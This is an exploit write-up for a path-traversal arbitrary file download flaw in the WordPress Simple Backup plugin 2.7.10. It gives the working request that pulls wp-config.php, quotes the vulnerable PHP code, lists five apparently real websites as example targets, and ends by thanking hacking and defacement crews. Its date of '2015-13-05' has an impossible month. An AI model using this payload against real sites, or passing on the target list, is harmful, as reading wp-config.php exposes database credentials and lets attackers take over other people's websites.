######################
# Exploit Title : Wordpress Simple Backup Plugin Arbitrary Download
File Vulnerability
# Exploit Author : Ashiyane Digital Security Team
# discovered by : Mahdi.Hidden
# Vendor Homepage : http://mywebsiteadvisor.com/
# Date: 2015-13-05
# Tested On : Windows - Linux
# Software Link :
https://downloads.wordpress.org/plugin/simple-backup.2.7.10.zip
# Version : 2.7.10 (Last Version)
######################
# Exploit :
#
[Site]/[Path]/wp-admin/tools.php?page=backup_manager&download_backup_file=../wp-config.php
#
# Vulnerable Code:
#
if(array_key_exists('download_backup_file', $_GET)){
$this->download_local_backup_file($_GET['download_backup_file']);
}
private function download_local_backup_file($filename){
$bk_dir = ABSPATH."simple-backup";
//unlink($bk_dir . $filename);
$file = "$bk_dir/$filename";
//$url =
"ftp://{$this->user}:{$this->pass}@{$this->server}/{$this->directory}/$filename";
clearstatcache();
$size = filesize($file);
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header("Content-Disposition: attachment; filename=$filename");
header("Content-Length: $size");
header('Connection: close');
//ob_clean();
ob_end_clean();
flush();
readfile($file);
die();
}
#
#
######################
# Examples:
#
#
https://daptonerecords.com/wp-admin/tools.php?page=backup_manager&download_backup_file=../wp-config.php
#
http://mywebsiteadvisor.com/wp-admin/tools.php?page=backup_manager&download_backup_file=../wp-config.php
#
http://3degreesdigital.com/wp-admin/tools.php?page=backup_manager&download_backup_file=../wp-config.php
#
http://travellingdijuca.com/WordPress/wp-admin/tools.php?page=backup_manager&download_backup_file=../wp-config.php
#
http://justinthedesigner.com/wp-admin/tools.php?page=backup_manager&download_backup_file=../wp-config.php
#
#
######################
# Special thanks to:
# ACC3SS - Milad Hacking - T3rm!nat0r5 and all of Ashiyane Exploiters
and Defacers.
######################